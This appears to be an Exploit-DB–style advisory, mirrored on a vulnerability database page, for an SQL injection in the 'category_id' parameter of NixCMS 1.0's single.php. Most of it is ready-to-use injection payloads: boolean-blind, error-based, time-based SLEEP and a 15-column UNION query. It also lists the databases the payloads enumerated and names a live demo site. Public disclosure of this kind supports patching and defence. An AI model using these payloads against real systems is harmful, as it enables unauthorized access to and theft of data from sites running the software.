NixCMS 1.0 - 'category_id' SQL Injection

🗓️ 05 Feb 2018 00:00:00Reported by Bora BozdoganType

NixCMS 1.0 'category_id' SQL Injection on single.ph

# #
# Exploit Title: NixCMS 1.0 - 'category_id' SQL Ýnjection
# Dork: N/A
# Date: 03.02.2018
# Vendor: https://www.nixdesign.de
# Software Link: https://www.nixdesign.de/nix-cms/
# Demo: http://www.jamaram.de/
# Version: 1.0
# Tested on: WiN10_X64
# Exploit Author: Bora Bozdogan
# Author WebSite : http://borabozdogan.net.tr
# Author E-mail : [email protected]
# Author Skype : borayazilim45
# # 
# POC:
# 
# http://localhost/[PATH]/single.php?category_id=[SQL]
# 
# Parameter: category_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: category_id=24' AND 1662=1662 AND 'ZFBe'='ZFBe
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: category_id=24' AND (SELECT 3422 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(3422=3422,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CjtO'='CjtO
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
#
# Payload: category_id=24' AND SLEEP(5) AND 'kjea'='kjea
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 15 columns
# Payload: category_id=24' UNION ALL SELECT NULL,CONCAT(0x71706a7171,0x6953455a5149636b5844654f6f6d4e74506c6b73465572725544644e584158745065566267437574,0x717a627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wFQF
#
# #

available databases [3]:
[*] information_schema
[*] usr_web24_1
[*] web24_4

05 Feb 2018 00:00Current

7.4High risk

Vulners AI Score7.4

NixCMS 1.0 - &#039;category_id&#039; SQL Injection

NixCMS 1.0 - 'category_id' SQL Injection